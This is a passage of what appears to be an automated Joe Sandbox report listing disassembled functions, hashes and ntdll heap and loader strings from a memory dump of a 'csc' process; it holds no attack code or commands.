                                                                                                                                                                                                                                                                                  • Instruction ID: ef8842b52c832fdc24f31a5da953cd91e89e8868093be8af2a296677eee30caf
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59901d111660ef109f35844c3fbe4430716dd14b9f00feb8da8f9db0c25a8050
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3A1B239A00229EBCF24CF54C888BA9B3B1BF58314F1509EAD949A7251D730AF85CF94
                                                                                                                                                                                                                                                                                  Function 05C5F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-2586055223
                                                                                                                                                                                                                                                                                  • Opcode ID: ec467111bd1676e9c09eab05cf5b74b8107f1ab62084aa436eaabbb9b710053f
                                                                                                                                                                                                                                                                                  • Instruction ID: 40bf41636d83d22a182a38982476e54b89870fc0e33b6434c686e7d74560c9de
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec467111bd1676e9c09eab05cf5b74b8107f1ab62084aa436eaabbb9b710053f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10612571204780AFE711DB64C848FA7BBE9FF80B60F140C59F9658B291CA74D984DB66
                                                                                                                                                                                                                                                                                  Function 05C590F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                                                                                                                  • Opcode ID: 4c236b6b6bf0698b51d644c64e7973d063e717b93b75f6bb530d21c5fd99bb0f
                                                                                                                                                                                                                                                                                  • Instruction ID: 9dbd376865f3ff542784057e374bc83ac72f3dde7d2e13f3009e5f70d1f56776
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c236b6b6bf0698b51d644c64e7973d063e717b93b75f6bb530d21c5fd99bb0f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931F436A00118EFDB11DB95CC89FAAB7B9FF44774F144CA1E805A7290D771EE80DA64
                                                                                                                                                                                                                                                                                  Function 05C70680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                                                                                                                  • Opcode ID: 3631a205e2f590a11c2e1c08753086af8675f6026493f76114ca9405489fd5b8
                                                                                                                                                                                                                                                                                  • Instruction ID: edd25abeccb7583866ff414048604cb06c99c6a0a6af7f4db5b73315d48df30c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3631a205e2f590a11c2e1c08753086af8675f6026493f76114ca9405489fd5b8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF17C74A00609DFDB15CF69C498F6ABBB6FB44304F1489A9E416AB781D734EA81CF90
                                                                                                                                                                                                                                                                                  Function 05CF3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                                                                                                                  • API String ID: 0-1168191160
                                                                                                                                                                                                                                                                                  • Opcode ID: 8531e2d1b17599e8d1a1bae705a2a65c99d964211c5ed08c3b690cc3bd70ac78
                                                                                                                                                                                                                                                                                  • Instruction ID: 2988c8b033399c4997533b059e08e46e7e757c14aa819a17a492bff44053d545
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8531e2d1b17599e8d1a1bae705a2a65c99d964211c5ed08c3b690cc3bd70ac78
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F170B1A042689BCBA0DB15CC94BE9B3B5BF44B04F144DDAD609A7240E7349F81CF98
                                                                                                                                                                                                                                                                                  Function 05C8F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 05CD00C7
                                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CD0128
                                                                                                                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 05CD00F1
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                                                                                                                  • Opcode ID: c7a349bd73d6ff0283e2127f60dacbbb8e6005f9ae1e2d161ac3d788095ee73a
                                                                                                                                                                                                                                                                                  • Instruction ID: c106e5aa8cefe10f7d27260cb1ab80dfc78819d23b2e2cc97978ebabd4bc1230
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7a349bd73d6ff0283e2127f60dacbbb8e6005f9ae1e2d161ac3d788095ee73a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32E1D1316087419FD725DF28C888B2AB7E1FB84318F140E5DF5A69B2E1E774EA44CB52
                                                                                                                                                                                                                                                                                  Function 05C6B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                                                                                  • API String ID: 0-1145731471
                                                                                                                                                                                                                                                                                  • Opcode ID: 244ae8d6e05f24f2242c1106fe53fbb9ca2cdbee96421697ee0bec11d5fed0e9
                                                                                                                                                                                                                                                                                  • Instruction ID: 461ea48e0aa3ebee0c7ac1209d5920f74ada3f551adeea96735653233b598045
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 244ae8d6e05f24f2242c1106fe53fbb9ca2cdbee96421697ee0bec11d5fed0e9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1B19071A546459BCB28CF55D990BADBBB6BF44B08F148C6DE852DB790D730DE80CB10
                                                                                                                                                                                                                                                                                  Function 05C5A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                                                                                                                  • Opcode ID: b1d99569d5eb1ddeac6e2d6f77741b958ab5922f2f69d69b9c8346fe8eab7f63
                                                                                                                                                                                                                                                                                  • Instruction ID: a0d9c6a9cd602ea713e83ccaa6a409e858e1bce03beabae5965d5a068d963d9f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1d99569d5eb1ddeac6e2d6f77741b958ab5922f2f69d69b9c8346fe8eab7f63
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FA16A36A016299BDF219B64CC88BEAB7B8EF04714F1009EAE909A7250D7749EC5CF54
                                                                                                                                                                                                                                                                                  Function 05C89723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-2283098728
                                                                                                                                                                                                                                                                                  • Opcode ID: 3f4b13658e31065003481fb2e5a6f79fd26df29db048a5b2fa14a5aaed6f92ee
                                                                                                                                                                                                                                                                                  • Instruction ID: 3b8b4318c32bfffa70fdb1c6d80527d0790e9484c6e9f21abac79be5e4ac0c6a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f4b13658e31065003481fb2e5a6f79fd26df29db048a5b2fa14a5aaed6f92ee
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5104317047069BCB24FF38C889A39B7A2FB84718F040E2EE55287691DB70E944DB92
                                                                                                                                                                                                                                                                                  Function 05C5F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 05CBE435
                                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 05CBE442
                                                                                                                                                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 05CBE455
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                                                                                                                                                  • Opcode ID: 761ecc7dad429ea9f1cd0f9faf8ff422c524b63fdae76e79a7898a27a87f20b2
                                                                                                                                                                                                                                                                                  • Instruction ID: 8d04cae6faa864fe0b846afb2e2486fb335daa6214927b656ea39ca1ae0f73df
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 761ecc7dad429ea9f1cd0f9faf8ff422c524b63fdae76e79a7898a27a87f20b2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F516A71304684AFE715CBA8C848FAABBF8FF05714F044DA5E94187692D374EA80DB50
                                                                                                                                                                                                                                                                                  Function 05C81514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 05CCA39D
                                                                                                                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 05CCA396
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 05CCA3A7
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                                                                                                                                                  • Opcode ID: a5634adb226999ce79d43ac9d482a56398d30178c6066da58ed68fdd1058b10b
                                                                                                                                                                                                                                                                                  • Instruction ID: b537efc06d0a9afd7e9668f434bc6cf0d69bf29fe17f65f322ad0c2e00d68fc8
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5634adb226999ce79d43ac9d482a56398d30178c6066da58ed68fdd1058b10b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34512430B047459BDB21DB5DC958B367BE5BB01718F180EA8E9539B6D1D770EA01CB40
                                                                                                                                                                                                                                                                                  Function 05D0D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 05D0D792
                                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 05D0D79F
                                                                                                                                                                                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 05D0D7B2
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                                                                                  • API String ID: 0-3815128232
                                                                                                                                                                                                                                                                                  • Opcode ID: 38a7267b952c5e6dae775621d84d71e7ec7fdb90e01813bcefb32cec4635cb24
                                                                                                                                                                                                                                                                                  • Instruction ID: caa2c9ebde78ddd4b2f8eb2060eb1c60794124df19aa96b68ddaa2cd914f8b96
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38a7267b952c5e6dae775621d84d71e7ec7fdb90e01813bcefb32cec4635cb24
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C5154382042548EE324EAADC844772B7E3EF85284F945C4FE4C78B2C4D676D843EBA0
                                                                                                                                                                                                                                                                                  Function 05C9C640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CD80F3
                                                                                                                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 05CD80E9
                                                                                                                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 05CD80E2
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                                                                                                                                                  • Opcode ID: b01745154f09744d63597f6dcfd271b129ad28c177aa517b384de50fac57fce2
                                                                                                                                                                                                                                                                                  • Instruction ID: 80c5ba041874fbc6be4e05c9bce17933556f923af2b5031bbb2affed7529cab2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b01745154f09744d63597f6dcfd271b129ad28c177aa517b384de50fac57fce2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B410471614340ABCB20EF28DC4AF6BBBE8FF44620F405D2AB949D3250EB70D904DB91
                                                                                                                                                                                                                                                                                  Function 05C5753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                                                                                                                  • Opcode ID: c8021f351e03234f640530bbb975814c5bc5a93e3294b9618481a19e7c3fa902
                                                                                                                                                                                                                                                                                  • Instruction ID: 58c80c492bc0ed5c28c265ae5a5e9ee1099eeba510d5807ee0f51def9f9ab375
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8021f351e03234f640530bbb975814c5bc5a93e3294b9618481a19e7c3fa902
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 394106342442408FEF25CE6DC484BB577E1EB01354F284CADD8868B656CAA9D6C9C765
                                                                                                                                                                                                                                                                                  Function 05C915EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 05CD1954
                                                                                                                                                                                                                                                                                  • LdrpAllocateTls, xrefs: 05CD194A
                                                                                                                                                                                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05CD1943
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-4274184382
                                                                                                                                                                                                                                                                                  • Opcode ID: a27c077f88f6a67709ae5a7216fb5f2f7225a55650e92cb582e54a8601d863e8
                                                                                                                                                                                                                                                                                  • Instruction ID: d6ee59f424ad9a502a67d31da5676a06297e325dd284c02d4fbdce75eeedd850
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a27c077f88f6a67709ae5a7216fb5f2f7225a55650e92cb582e54a8601d863e8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15418D75A00206AFDB15DFA9DC86BADFBF1FF48700F184929E402A7350DB35A900DB90
                                                                                                                                                                                                                                                                                  Function 05C91527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 05CD185B
                                                                                                                                                                                                                                                                                  • LdrpInitializeTls, xrefs: 05CD1851
                                                                                                                                                                                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 05CD184A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-931879808
                                                                                                                                                                                                                                                                                  • Opcode ID: e783ed43b5bdc15cb314bdfab1104f7663b31d195b3b79f034916794afa8c60c
                                                                                                                                                                                                                                                                                  • Instruction ID: eb9996af74b1ab43ecdc229d79d0ab7fefab734446ccc085b47f5abe13d82d46
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e783ed43b5bdc15cb314bdfab1104f7663b31d195b3b79f034916794afa8c60c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D31D771B10306ABDF15DA59DC8BF7AB779BB40754F0A086AF506A7280DB70BE40D790
                                                                                                                                                                                                                                                                                  Function 05CA1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • @, xrefs: 05CA11C5
                                                                                                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 05CA119B
                                                                                                                                                                                                                                                                                  • BuildLabEx, xrefs: 05CA122F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
